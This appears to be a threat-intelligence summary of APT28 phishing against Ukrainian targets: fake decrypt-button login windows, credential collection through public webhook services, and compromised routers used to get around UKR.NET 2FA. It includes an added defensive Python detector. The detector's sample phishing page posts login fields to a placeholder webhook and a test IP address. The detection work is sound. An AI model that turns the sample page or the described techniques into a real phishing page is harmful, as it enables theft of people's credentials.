Summary:
In May 2023, APT28 was observed employing several phishing techniques against Ukrainian civil society. These included the use of public HTTP webhook services such as Pipedream and Webhook.site, and the compromise of Ubiquiti routers to harvest victims' credentials. APT28 was also observed using the "Browser in the Browser" technique, which presents a counterfeit login window to the victim under the guise of decrypting a document.
Researchers detected an HTML file impersonating the Ukrainian security think tank Centre for Defence Strategies. The decoy document tries to lure the victim into clicking a button that supposedly decrypts the content of the page. Clicking the button displays an impersonated login window that contains an "iframe" embedding a counterfeit UKR[.]NET login page; the goal is to get the user to enter their credentials. Researchers have observed APT28 using another technique for over a year: embedding public HTTP debugging/webhook services in their phishing pages to collect stolen credentials. This means APT28 operators do not need to set up any additional scripts or infrastructure to gather the credentials; they simply create a webhook page on the service and wait for credentials to arrive from the victim. During the investigation, specialists identified two such services abused by APT28, PipeDream[.]com and Webhook[.]site, both of which accept HTTP requests without any user registration or sign-up.
For accounts protected by 2FA (two-factor authentication), APT28 built dedicated phishing pages hosted on their own domains. These pages interact with a Python script running on compromised Ubiquiti routers. Most of the observed phishing domains were created using free services and were short-lived, typically used for a single campaign. When a user entered credentials on one of these pages, the data was sent via an HTTP POST request to a remote IP address, which was found to belong to the compromised Ubiquiti network devices. The Python script then uses the UKR[.]NET API to authenticate as the user and circumvent the 2FA step, which is the most noteworthy part of the operation. The script also has the ability to delete the most recently received emails.
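The report describes three observable traits of these phishing pages: an iframe embedding a lookalike UKR.NET login page, a form that posts credentials to a public webhook service, and a form that posts to a bare IP address (the compromised router). The following added example, which is not code from the report or from any of the researchers cited, is a small static check a defender could run over a captured HTML attachment to flag those traits. The sample page, the placeholder lookalike host `ukr-net-login.example`, the TEST-NET address `192.0.2.10`, and the `PLACEHOLDER-ID` webhook path are all constructed for the demo and are not real indicators.

```python
"""
Added example (not part of the original report): flag HTML phishing-page
traits described in the text using only the Python standard library.
  * form/iframe target on a public webhook service (webhook.site, pipedream.com)
  * form that POSTs credentials to a bare IP address instead of a hostname
  * iframe that embeds a login page on a host imitating ukr.net
All sample values below are constructed; none are real indicators.
"""
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Services named in the report as credential sinks that need no registration.
WEBHOOK_SERVICES = {"webhook.site", "pipedream.com"}
# The genuine mail provider being impersonated; subdomains are also legitimate.
LEGIT_MAIL_HOSTS = {"ukr.net"}


def _host(url):
    """Lower-cased hostname of a URL, or '' if it has none."""
    try:
        return (urlparse(url).hostname or "").lower()
    except ValueError:
        return ""


def _is_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def _matches_domain(host, domains):
    """True if host equals one of the domains or is a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


class _TargetCollector(HTMLParser):
    """Collect (tag, url) for every <form action> and <iframe src>."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.targets.append(("form", a["action"]))
        elif tag == "iframe" and a.get("src"):
            self.targets.append(("iframe", a["src"]))


def find_phishing_traits(html):
    """Return a list of (tag, host, reason) findings for the given HTML."""
    parser = _TargetCollector()
    parser.feed(html)
    findings = []
    for tag, url in parser.targets:
        host = _host(url)
        if not host:
            continue
        if _matches_domain(host, WEBHOOK_SERVICES):
            findings.append((tag, host, "target is a public webhook/debugging service"))
        elif _is_ip(host):
            findings.append((tag, host, "target is a bare IP address"))
        elif tag == "iframe" and "ukr" in host and not _matches_domain(host, LEGIT_MAIL_HOSTS):
            findings.append((tag, host, "embedded page imitates ukr.net on a non-ukr.net host"))
    return findings


# Constructed sample mimicking the decoy described in the report.
SAMPLE_PAGE = """
<html><body>
<p>This document is encrypted. Click the button to decrypt it.</p>
<button>Decrypt</button>
<div id="fake-login-window">
  <iframe src="https://ukr-net-login.example/login"></iframe>
</div>
<form method="post" action="https://webhook.site/PLACEHOLDER-ID">
  <input name="user"><input name="pass" type="password">
</form>
<form method="post" action="http://192.0.2.10/collect"></form>
</body></html>
"""

if __name__ == "__main__":
    for tag, host, reason in find_phishing_traits(SAMPLE_PAGE):
        print(f"[{tag}] {host}: {reason}")
```

The check is deliberately conservative: a form or iframe pointing at the real `ukr.net` (or any of its subdomains) produces no finding, so it can run over mail attachments as a triage filter before a manual look.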
APT28 was also found to be behind a credential-harvesting phishing campaign targeting private email addresses in the United States and Ukraine. During this campaign, researchers noted a consistent pattern of impersonation of a medium-sized business in the auto-manufacturing sector in Saudi Arabia.
Threat Profile:

References:
The following reports contain further technical details: